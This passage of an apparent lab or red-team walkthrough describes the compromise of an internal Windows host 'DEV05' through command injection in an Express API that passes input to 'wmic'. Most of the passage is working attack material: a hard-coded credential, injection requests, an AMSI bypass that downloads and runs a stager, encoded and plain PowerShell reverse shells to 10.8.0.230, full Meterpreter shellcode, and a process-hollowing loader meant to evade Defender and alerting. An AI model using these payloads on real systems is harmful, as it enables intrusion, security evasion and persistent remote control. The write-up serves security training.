Host is up (0.29s latency).
Not shown: 7 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3128/tcp open  squid-http

Interesting another Squid proxy is found

Then let’s check:

image

image

Click also on Explore button but nothing in the public profile.

Try to register a new account but rejected too.

Checked and no security alert has been triggered but we don’t have access.

Hummm maybe we can’t access from outside (some ACL block that) and needed to be on allowed networks to be able to logon successfully.

Let’s retry from the VDI02 RDP session but using the Firefox profile then bingo we can signin:

image

Checked if possible to signin from outside using our SSH proxy tunnel but failed, so really required to use the VDI02 RDP Firefox profile.

Quick check and seems we have our own project named syscheck:

image

Syscheck is an internal app that allows our admins to quickly get various information from domain computers.

syscheck.js:

const express = require('express');
const { exec } = require('child_process');
const bodyParser = require('body-parser');
const basicAuth = require('express-basic-auth');

const app = express();
const port = 13300;

app.use(bodyParser.json());

app.use(basicAuth({
    users: { 'dev': 'dev-5381' },
    challenge: true,
    unauthorizedResponse: (req) => 'Unauthorized'
}));

app.get('/api/info', (req, res) => {
    exec('systeminfo', (error, stdout, stderr) => {
        if (error) {
            res.status(500).send(`Error: ${stderr}`);
            return;
        }
        res.send(stdout);
    });
});

app.post('/api/query', (req, res) => {
    const { query } = req.body;
    exec(`wmic ${query}`, (error, stdout, stderr) => {
        if (error) {
            res.status(500).send(`Error: ${stderr}`);
            return;
        }
        res.send(stdout);
    });
});

app.listen(port, '0.0.0.0', () => {
    console.log(`Server running at http://0.0.0.0:${port}/`);
});

Found dev:dev-5381

Analyzing the Javascript code we can see:

  • listening port is 13300/tcp
  • 2 endpoints /api/info and /api/query
  • /api/info can execute the systeminfo command line
  • /api/query can execute the WMI command-line (WMIC) utility

Seems we can abuse the second endpoint to obtain a shell.

DEV05 - API abusing

Important
  • Reminder of the ROE:
    • Please do not RDP to DEV05, a user is working on a critical project there.

So following this, maybe syscheck is the critical project and in this case Jack is this user.

We don’t use RDP against this host but we can check if the port 13300/tcp is open:

$ proxychains -q nmap -sT -v -T4 -p 13300 --open -Pn 172.16.41.40
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-24 04:25 JST
Initiating Connect Scan at 04:25
Scanning dev05.eu-ifrit.vl (172.16.41.40) [1 port]
Discovered open port 13300/tcp on 172.16.41.40
Completed Connect Scan at 04:25, 0.69s elapsed (1 total ports)
Nmap scan report for dev05.eu-ifrit.vl (172.16.41.40)
Host is up (0.68s latency).

PORT      STATE SERVICE
13300/tcp open  unknown

Confirmed

Ok so seems we have a path to get a shell:

  • 172.16.40.150 (GIT) has 3128/tcp (Squid proxy) open
  • 172.16.41.40 (DEV05) has 13300/tcp open

To confirm that we can correctly execute an internal command via WMIC then we can proceed like this:

$ curl -x "http://172.16.40.150:3128/" \
-X POST "http://172.16.41.40:13300/api/query" \
-H "Content-Type: application/json" \
-u dev:dev-5381 --data \
'{"query":"blabla & whoami"}'
eu-ifrit\jack.smith

or also like this:

$ curl -x "http://172.16.40.150:3128/" \
-X POST "http://172.16.41.40:13300/api/query" \
-H "Content-Type: application/json" \
-u dev:dev-5381 --data \
'{"query":"blabla & hostname"}'
DEV05

But as it’s common commands often executed by attacker then security alerts are triggered:

image

image

So what thing we can do to confirm that we want and does not trigger any alert, it’s like this:

$ curl -x "http://172.16.40.150:3128/" \
-X POST "http://172.16.41.40:13300/api/query" \
-H "Content-Type: application/json" \
-u dev:dev-5381 --data \
'{"query":"blabla & dir \\Users"}'
 Volume in drive C has no label.
 Volume Serial Number is D0B0-9416

 Directory of C:\Users

07/14/2024  02:05 AM    <DIR>          .
07/14/2024  02:05 AM    <DIR>          ..
07/16/2024  12:06 PM    <DIR>          admin
08/02/2024  02:47 AM    <DIR>          jack.smith
07/14/2024  06:47 AM    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)   1,741,324,288 bytes free
$ curl -x "http://172.16.40.150:3128/" \
-X POST "http://172.16.41.40:13300/api/query" \
-H "Content-Type: application/json" \
-u dev:dev-5381 --data \
'{"query":"blabla & ipconfig"}'

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : eu-central-1.compute.internal
   Link-local IPv6 Address . . . . . : fe80::e7ce:4467:f647:8a11%5
   IPv4 Address. . . . . . . . . . . : 172.16.41.40
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.41.1

No security alert as normal command for a user and we can get the info on IP address of DEV05 and yes Jack works on this machine and we found also another account named admin

PoSH reverse shell (POC)

As a POC, we create 2 staging payloads in Powershell:

  • stage1.ps1
    • Download & Execute in background with AMSI Bypass our stage2
$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u));
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static');
$field.SetValue($null,$true);
IEX(New-Object Net.WebClient).downloadString('http://10.8.0.230/stage2.ps1')
  • stage2.ps1
    • Base64 encoded reverse shell (443/tcp) and the clear data version
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADAALgAyADMAMAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.8.0.230', 443);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"

Set a local web server:

$ python3 -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Set a Netcat listener:

$ rlwrap -cAr nc -lvnp 443
Listening on 0.0.0.0 443

Here we go:

$ curl -x "http://172.16.40.150:3128/" \
-X POST "http://172.16.41.40:13300/api/query" \
-H "Content-Type: application/json" \
-u dev:dev-5381 --data \
'{"query":"blabla & powershell iex(iwr -usebasicparsing 10.8.0.230/stage1.ps1)"}'
$ rlwrap -cAr nc -lvnp 443
Listening on 0.0.0.0 443
Connection received on 172.16.41.40 50411

PS C:\Windows\system32> [Environment]::UserName
jack.smith

We check our current user with this method to avoid any security detection (prohibit to use whoami, hostname etc)

We gain an access but the session is closed quickly (timeout of the API request) so we need to set a C2 beacon then migrate it to another process to keep it permanent.

C2 preparing (with Metasploit)

Create a Meterpreter shellcode:

$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.8.0.230 LPORT=443 -f ps1 -v SHELLCODE                           
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 710 bytes
Final size of ps1 file: 3480 bytes
[Byte[]] $SHELLCODE = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,0x51,0x56,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x4d,0x31,0xc9,0x48,0xf,0xb7,0x4a,0x4a,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x44,0x8b,0x40,0x20,0x8b,0x48,0x18,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0x41,0xc1,0xc9,0xd,0xac,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x41,0x58,0x41,0x58,0x5e,0x59,0x48,0x1,0xd0,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x0,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,0x7,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x53,0x53,0x49,0xba,0x3a,0x56,0x79,0xa7,0x0,0x0,0x0,0x0,0xff,0xd5,0xe8,0xb,0x0,0x0,0x0,0x31,0x30,0x2e,0x38,0x2e,0x30,0x2e,0x32,0x33,0x30,0x0,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0xbb,0x1,0x0,0x0,0x4d,0x31,0xc9,0x53,0x53,0x6a,0x3,0x53,0x49,0xba,0x57,0x89,0x9f,0xc6,0x0,0x0,0x0,0x0,0xff,0xd5,0xe8,0xa0,0x0,0x0,0x0,0x2f,0x68,0x50,0x32,0x46,0x57,0x79,0x4d,0x69,0x4e,0x34,0x46,0x4c,0x46,0x6b,0x6f,0x55,0x4c,0x64,0x30,0x33,0x5f,0x41,0x4e,0x59,0x54,0x65,0x31,0x68,0x6e,0x69,0x71,0x4d,0x76,0x66,0x50,0x73,0x56,0x51,0x5a,0x6d,0x58,0x72,0x59,0x71,0x56,0x56,0x74,0x54,0x53,0x47,0x51,0x6b,0x38,0x51,0x50,0x68,0x64,0x70,0x5a,0x58,0x6f,0x31,0x79,0x64,0x32,0x71,0x49,0x39,0x48,0x75,0x31,0x57,0x5f,0x36,0x5a,0x74,0x48,0x55,0x5a,0x32,0x56,0x78,0x56,0x59,0x69,0x39,0x43,0x68,0x58,0x46,0x71,0x66,0x42,0x65,0x64,0x49,0x47,0x4a,0x34,0x44,0x35,0x64,0x51,0x72,0x4c,0x6a,0x51,0x37,0x4e,0x56,0x77,0x7a,0x52,0x36,0x61,0x70,0x49,0x64,0x56,0x49,0x49,0x44,0x55,0x4d,0x61,0x39,0x5a,0x52,0x6d,0x56,0x35,0x2d,0x52,0x66,0x6d,0x64,0x41,0x74,0x52,0x58,0x54,0x74,0x7a,0x71,0x55,0x62,0x30,0x4e,0x31,0x79,0x73,0x4e,0x59,0x4f,0x57,0x4a,0x56,0x53,0x0,0x48,0x89,0xc1,0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8,0x0,0x32,0xa8,0x84,0x0,0x0,0x0,0x0,0x50,0x53,0x53,0x49,0xc7,0xc2,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x6a,0xa,0x5f,0x48,0x89,0xf1,0x6a,0x1f,0x5a,0x52,0x68,0x80,0x33,0x0,0x0,0x49,0x89,0xe0,0x6a,0x4,0x41,0x59,0x49,0xba,0x75,0x46,0x9e,0x86,0x0,0x0,0x0,0x0,0xff,0xd5,0x4d,0x31,0xc0,0x53,0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,0x4d,0x31,0xc9,0x53,0x53,0x49,0xc7,0xc2,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,0x0,0x0,0x49,0xba,0x44,0xf0,0x35,0xe0,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0xff,0xcf,0x74,0x2,0xeb,0xaa,0xe8,0x55,0x0,0x0,0x0,0x53,0x59,0x6a,0x40,0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,0xc0,0x0,0x10,0x0,0x0,0x49,0xba,0x58,0xa4,0x53,0xe5,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0x0,0x20,0x0,0x0,0x49,0x89,0xf9,0x49,0xba,0x12,0x96,0x89,0xe2,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb2,0x66,0x8b,0x7,0x48,0x1,0xc3,0x85,0xc0,0x75,0xd2,0x58,0xc3,0x58,0x6a,0x0,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5

In order to bypass Defender, we use DynWin32-ShellcodeProcessHollowing.ps1(PowerShell implementation of shellcode based Process Hollowing that only relies on dynamically resolved Win32 API functions).

We edit our stage3.ps1 then add our shellcode:

<#

DynWin32-ShellcodeProcessHollowing.ps1 performs shellcode based process hollowing using
dynamically looked up Win32 API calls. The script obtains the methods GetModuleHandle,
GetProcAddress and CreateProcess by using reflection. Afterwards it utilizes GetModuleHandle
and GetProcAddress to obtain the addresses of the other required Win32 API calls.

When all required Win32 API calls are looked up, it starts svchost.exe in a suspended state
and overwrites the entrypoint with the specified shellcode. Afterwards, the thread is resumed
and the shellcode is executed enveloped within the trusted svchost.exe process.

This script should be used for educational purposes only. It was only tested on Windows 10 (x64)
and is probably not stable or portable. It's only purpose is to demonstrate the usage of reflective
lookups of Win32 API calls. See it as just an silly experiment :)

Author: Tobias Neitzel (@qtc_de)
License: GPL-3.0 License

#>

[Byte[]] $SHELLCODE = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,0x51,0x56,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x4d,0x31,0xc9,0x48,0xf,0xb7,0x4a,0x4a,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x44,0x8b,0x40,0x20,0x8b,0x48,0x18,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0x41,0xc1,0xc9,0xd,0xac,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x41,0x58,0x41,0x58,0x5e,0x59,0x48,0x1,0xd0,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x0,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,0x7,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x53,0x53,0x49,0xba,0x3a,0x56,0x79,0xa7,0x0,0x0,0x0,0x0,0xff,0xd5,0xe8,0xb,0x0,0x0,0x0,0x31,0x30,0x2e,0x38,0x2e,0x30,0x2e,0x32,0x33,0x30,0x0,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0xbb,0x1,0x0,0x0,0x4d,0x31,0xc9,0x53,0x53,0x6a,0x3,0x53,0x49,0xba,0x57,0x89,0x9f,0xc6,0x0,0x0,0x0,0x0,0xff,0xd5,0xe8,0xa0,0x0,0x0,0x0,0x2f,0x68,0x50,0x32,0x46,0x57,0x79,0x4d,0x69,0x4e,0x34,0x46,0x4c,0x46,0x6b,0x6f,0x55,0x4c,0x64,0x30,0x33,0x5f,0x41,0x4e,0x59,0x54,0x65,0x31,0x68,0x6e,0x69,0x71,0x4d,0x76,0x66,0x50,0x73,0x56,0x51,0x5a,0x6d,0x58,0x72,0x59,0x71,0x56,0x56,0x74,0x54,0x53,0x47,0x51,0x6b,0x38,0x51,0x50,0x68,0x64,0x70,0x5a,0x58,0x6f,0x31,0x79,0x64,0x32,0x71,0x49,0x39,0x48,0x75,0x31,0x57,0x5f,0x36,0x5a,0x74,0x48,0x55,0x5a,0x32,0x56,0x78,0x56,0x59,0x69,0x39,0x43,0x68,0x58,0x46,0x71,0x66,0x42,0x65,0x64,0x49,0x47,0x4a,0x34,0x44,0x35,0x64,0x51,0x72,0x4c,0x6a,0x51,0x37,0x4e,0x56,0x77,0x7a,0x52,0x36,0x61,0x70,0x49,0x64,0x56,0x49,0x49,0x44,0x55,0x4d,0x61,0x39,0x5a,0x52,0x6d,0x56,0x35,0x2d,0x52,0x66,0x6d,0x64,0x41,0x74,0x52,0x58,0x54,0x74,0x7a,0x71,0x55,0x62,0x30,0x4e,0x31,0x79,0x73,0x4e,0x59,0x4f,0x57,0x4a,0x56,0x53,0x0,0x48,0x89,0xc1,0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8,0x0,0x32,0xa8,0x84,0x0,0x0,0x0,0x0,0x50,0x53,0x53,0x49,0xc7,0xc2,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x6a,0xa,0x5f,0x48,0x89,0xf1,0x6a,0x1f,0x5a,0x52,0x68,0x80,0x33,0x0,0x0,0x49,0x89,0xe0,0x6a,0x4,0x41,0x59,0x49,0xba,0x75,0x46,0x9e,0x86,0x0,0x0,0x0,0x0,0xff,0xd5,0x4d,0x31,0xc0,0x53,0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,0x4d,0x31,0xc9,0x53,0x53,0x49,0xc7,0xc2,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,0x0,0x0,0x49,0xba,0x44,0xf0,0x35,0xe0,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0xff,0xcf,0x74,0x2,0xeb,0xaa,0xe8,0x55,0x0,0x0,0x0,0x53,0x59,0x6a,0x40,0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,0xc0,0x0,0x10,0x0,0x0,0x49,0xba,0x58,0xa4,0x53,0xe5,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0x0,0x20,0x0,0x0,0x49,0x89,0xf9,0x49,0xba,0x12,0x96,0x89,0xe2,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb2,0x66,0x8b,0x7,0x48,0x1,0xc3,0x85,0xc0,0x75,0xd2,0x58,0xc3,0x58,0x6a,0x0,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5

filter Get-Type ([string]$dllName,[string]$typeName)
{
    if( $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals($dllName) )
    {
        $_.GetType($typeName)
    }
}

function Get-Function
{
    Param(
        [string] $module,
        [string] $function
    )

    if( ($null -eq $GetModuleHandle) -or ($null -eq $GetProcAddress) )
    {
        throw "Error: GetModuleHandle and GetProcAddress must be initialized first!"
    }

    $moduleHandle = $GetModuleHandle.Invoke($null, @($module))
    $GetProcAddress.Invoke($null, @($moduleHandle, $function))
}

function Get-Delegate
{
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [IntPtr] $funcAddr,
        [Parameter(Position = 1, Mandatory = $True)] [Type[]] $argTypes,
        [Parameter(Position = 2)] [Type] $retType = [Void]
    )

    $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
    DefineDynamicModule('QM', $false).
    DefineType('QT', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $argTypes).SetImplementationFlags('Runtime, Managed')
    $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $retType, $argTypes).SetImplementationFlags('Runtime, Managed')
    $delegate = $type.CreateType()

    [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($funcAddr, $delegate)
}

# Obtain the required types via reflection
$assemblies = [AppDomain]::CurrentDomain.GetAssemblies()
$unsafeMethodsType = $assemblies | Get-Type 'System.dll' 'Microsoft.Win32.UnsafeNativeMethods'
$nativeMethodsType = $assemblies | Get-Type 'System.dll' 'Microsoft.Win32.NativeMethods'
$startupInformationType =  $assemblies | Get-Type 'System.dll' 'Microsoft.Win32.NativeMethods+STARTUPINFO'
$processInformationType =  $assemblies | Get-Type 'System.dll' 'Microsoft.Win32.SafeNativeMethods+PROCESS_INFORMATION'

# Obtain the required functions via reflection: GetModuleHandle, GetProcAddress and CreateProcess
$GetModuleHandle = $unsafeMethodsType.GetMethod('GetModuleHandle')
$GetProcAddress = $unsafeMethodsType.GetMethod('GetProcAddress', [reflection.bindingflags]'Public,Static', $null, [System.Reflection.CallingConventions]::Any, @([System.IntPtr], [string]), $null);
$CreateProcess = $nativeMethodsType.GetMethod("CreateProcess")

# Obtain the function addresses of the required hollowing functions
$ResumeThreadAddr = Get-Function "kernel32.dll" "ResumeThread"
$ReadProcessMemoryAddr = Get-Function "kernel32.dll" "ReadProcessMemory"
$WriteProcessMemoryAddr = Get-Function "kernel32.dll" "WriteProcessMemory"
$ZwQueryInformationProcessAddr = Get-Function "ntdll.dll" "ZwQueryInformationProcess"

# Create the delegate types to call the previously obtain function addresses
$ResumeThread = Get-Delegate $ResumeThreadAddr @([IntPtr])
$WriteProcessMemory = Get-Delegate $WriteProcessMemoryAddr @([IntPtr], [IntPtr], [Byte[]], [Int32], [IntPtr])
$ReadProcessMemory = Get-Delegate $ReadProcessMemoryAddr @([IntPtr], [IntPtr], [Byte[]], [Int], [IntPtr]) ([Bool])
$ZwQueryInformationProcess = Get-Delegate $ZwQueryInformationProcessAddr @([IntPtr], [Int], [Byte[]], [UInt32], [UInt32]) ([Int])

# Instantiate the required structures for CreateProcess and use them to launch svchost.exe
$startupInformation = $startupInformationType.GetConstructors().Invoke($null)
$processInformation = $processInformationType.GetConstructors().Invoke($null)

$cmd = [System.Text.StringBuilder]::new("C:\\Windows\\System32\\svchost.exe")
$CreateProcess.Invoke($null, @($null, $cmd, $null, $null, $false, 0x4, [IntPtr]::Zero, $null, $startupInformation, $processInformation))

# Obtain the required handles from the PROCESS_INFORMATION structure
$hThread = $processInformation.hThread
$hProcess = $processInformation.hProcess

# Create a buffer to hold the PROCESS_BASIC_INFORMATION structure and call ZwQueryInformationProcess
$processBasicInformation = [System.Byte[]]::CreateInstance([System.Byte], 48)
$ZwQueryInformationProcess.Invoke($hProcess, 0, $processBasicInformation, $processBasicInformation.Length, 0)

# Locate the image base address. The address of the PEB is the second element within the PROCESS_BASIC_INFORMATION
# structure (e.g. offset 0x08 within the $processBasicInformation buffer on x64). Within the PEB, the base image
# addr is located at offset 0x10.
$imageBaseAddrPEB = ([IntPtr]::new([BitConverter]::ToUInt64($processBasicInformation, 0x08) + 0x10))

# Use ReadProcessMemory to read the required part of the PEB. We allocate already a buffer for 0x200
# bytes that we will use later on. From the PEB we actually only need 0x08 bytes, as $imageBaseAddrPEB
# already points to the correct memory location. We parse the obtained 0x08 bytes as Int64 and IntPtr.
$memoryBuffer = [System.Byte[]]::CreateInstance([System.Byte], 0x200)
$ReadProcessMemory.Invoke($hProcess, $imageBaseAddrPEB, $memoryBuffer, 0x08, 0)

$imageBaseAddr = [BitConverter]::ToInt64($memoryBuffer, 0)
$imageBaseAddrPointer = [IntPtr]::new($imageBaseAddr)

# Now that we have the base address, we can read the first 0x200 bytes to obtain the PE file format header.
# The offset of the PE header is at 0x3c within the PE file format header. Within the PE header, the relative
# entry point address can be found at an offset of 0x28. We combine this with the $imageBaseAddr and have finally
# found the non relative entry point address.
$ReadProcessMemory.Invoke($hProcess, $imageBaseAddrPointer, $memoryBuffer, $memoryBuffer.Length, 0)

$peOffset = [BitConverter]::ToUInt32($memoryBuffer, 0x3c)                               # PE header offset
$entryPointAddrRelative = [BitConverter]::ToUInt32($memoryBuffer, $peOffset + 0x28)     # Relative entrypoint
$entryPointAddr = [IntPtr]::new($imageBaseAddr + $entryPointAddrRelative)               # Absolute entrypoint

# Overwrite the entrypoint with shellcode and resume the thread.
$WriteProcessMemory.Invoke($hProcess, $entryPointAddr, $SHELLCODE, $SHELLCODE.Length, [IntPtr]::Zero)
$ResumeThread.Invoke($hThread)

# Close powershell to remove it as the parent of svchost.exe
exit

We set our Meterpreter listener:

$ msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https; set LHOST tun0; set LPORT 443; set ExitOnSession false; exploit -j"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/meterpreter/reverse_https
LHOST => tun0
LPORT => 443
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) > 
[*] Started HTTPS reverse handler on https://10.8.0.230:443

Then we abuse the API to download and execute in memory our payload (AMSI and Defender bypassed as well):

$ curl -x "http://172.16.40.150:3128/" \
-X POST "http://172.16.41.40:13300/api/query" \
-H "Content-Type: application/json" \
-u dev:dev-5381 --data \
'{"query":"blabla & powershell iex(iwr -usebasicparsing 10.8.0.230/stage3.ps1)"}'
True
0
True
True

We get a callback and a session as Jack on DEV05, we then migrate to Explorer process to keep a persistent connection:

[!] https://10.8.0.230:443 handling request from 172.16.41.40; (UUID: jziv9aay) Without a database connected that payload UUID tracking will not work!
[*] https://10.8.0.230:443 handling request from 172.16.41.40; (UUID: jziv9aay) Staging x64 payload (202844 bytes) ...
[!] https://10.8.0.230:443 handling request from 172.16.41.40; (UUID: jziv9aay) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.8.0.230:443 -> 172.16.41.40:63720) at 2024-08-26 03:55:28 +0900

